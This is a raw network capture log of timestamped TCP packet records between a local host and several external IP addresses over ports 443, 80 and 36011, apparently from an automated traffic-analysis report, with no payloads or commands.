Oct 13, 2023 15:21:15.847661972 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.849498987 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.849512100 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.849560976 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.849570036 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.849656105 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.851525068 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.851536989 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.851598978 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.851607084 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.851651907 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.853909969 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.853923082 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.853971958 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.853981018 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.854020119 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.855926037 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.855937958 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.856014013 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.856023073 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.856064081 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.857942104 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.857954979 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.858002901 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.858011007 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.858056068 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.859837055 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.859850883 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.859915972 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.859925032 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.859966040 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.861720085 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.861735106 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.861784935 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.861793995 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.861831903 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.863848925 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.863867044 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.863909006 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.863918066 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.863951921 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.865847111 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.865859985 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.865921974 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.865931034 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.865972996 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.867921114 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.867933989 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.867991924 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.868001938 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.868043900 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.870110989 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.870124102 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.870182991 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.870192051 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.870238066 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.872119904 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.872132063 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.872184992 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.872194052 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.872236013 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.873931885 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.873950958 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.873992920 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.874001026 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.874030113 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.874038935 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.875729084 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.875741959 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.875808001 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.875816107 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.875855923 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.877587080 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.877600908 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.877661943 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.877670050 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.877712965 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.879204988 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.879218102 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.879270077 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.879277945 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.879319906 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.880794048 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.880808115 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.880867958 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.880877018 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.880918026 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.882457018 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.882469893 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.882540941 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.882549047 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.882591009 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.884241104 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.884253025 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.884320021 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.884329081 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.884375095 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.884471893 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:15.885940075 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.885951996 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.886004925 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.886013985 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.886054993 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.986491919 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:16.149012089 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.149032116 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.149049044 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.149065971 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.149095058 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.149123907 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.149173021 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.149190903 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.149238110 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.149238110 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.149300098 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.149343014 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.149375916 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.149451971 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.149493933 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.149516106 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.149580002 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.149621010 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.149938107 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.149972916 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.150016069 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.150048018 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.150160074 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.150202990 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.150247097 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.150336027 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.150393963 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.150418043 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.150477886 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.150501013 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.150521040 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.150556087 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.150600910 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.150664091 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.150719881 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.150764942 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.150775909 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.150892973 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.150938034 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.150950909 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.150981903 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.151026964 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.151053905 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.151122093 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.151164055 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.151197910 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.151267052 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.151305914 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.151308060 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.151395082 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.151437044 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.151454926 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.151520967 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.151563883 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.152766943 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.152836084 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.152879953 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.152888060 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.152947903 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.152991056 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.163506031 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.163518906 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.163546085 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.163577080 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.163609982 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.163629055 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.163655043 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.165081024 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.165100098 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.165138960 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.165148020 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.165174961 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.165188074 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.166918993 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.166938066 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.166986942 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.167006016 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.167037964 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.167048931 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.168526888 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.168544054 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.168581963 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.168590069 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.168620110 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.168632984 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.170247078 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.170267105 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.170300007 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.170306921 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.170324087 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.170355082 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.172352076 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.172373056 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.172409058 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.172416925 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.172435999 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.172460079 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.174261093 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.174279928 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.174315929 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.174324036 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.174341917 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.174367905 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.176143885 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.176162958 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.176198959 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.176206112 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.176234961 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.176676989 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.178126097 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.178144932 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.178179979 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.178188086 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.178206921 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.178231001 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.181248903 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.181268930 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.181303024 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.181310892 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.181339025 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.181348085 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.184688091 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.184714079 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.184745073 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.184752941 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.184784889 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.184794903 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.186878920 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.186897993 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.186944962 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.186953068 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.186983109 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.187000990 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.189265013 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.189284086 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.189323902 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.189331055 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.189364910 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.189377069 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.191492081 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.191515923 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.191557884 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.191565990 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.191601038 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.191611052 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.194345951 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.194370985 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.194542885 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.194542885 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.194576025 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.194626093 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.196774006 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.196805954 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.196834087 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.196842909 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.196861982 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.196882010 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.199393988 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.199413061 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.199460983 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.199470997 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.199507952 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.199552059 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.201860905 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.201879025 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.201935053 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.201944113 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.201961040 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.201984882 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.204870939 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.204890013 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.204942942 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.204952955 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.204982042 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.204993010 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.206866980 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.206885099 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.206928015 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.206963062 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.206983089 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.207006931 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.208894968 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.208914995 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.208978891 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.208987951 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.209002972 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.209027052 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.210787058 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.210807085 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.210844994 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.210853100 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.210875034 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.210894108 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.212652922 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.212673903 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.212718010 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.212724924 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.212753057 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.212773085 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.215286016 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.215306044 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.215344906 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.215353012 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.215368032 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.215401888 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.217624903 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.217643023 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.217678070 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.217688084 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.217709064 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.217730999 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.219460011 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.219477892 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.219540119 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.219549894 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.219574928 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.219588041 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.221280098 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.221298933 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.221339941 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.221349001 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.221379042 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.221395016 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.223018885 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.223038912 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.223093987 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.223103046 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.223134041 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.223153114 CEST	49736	443	192.168.2.5	45.130.41.106
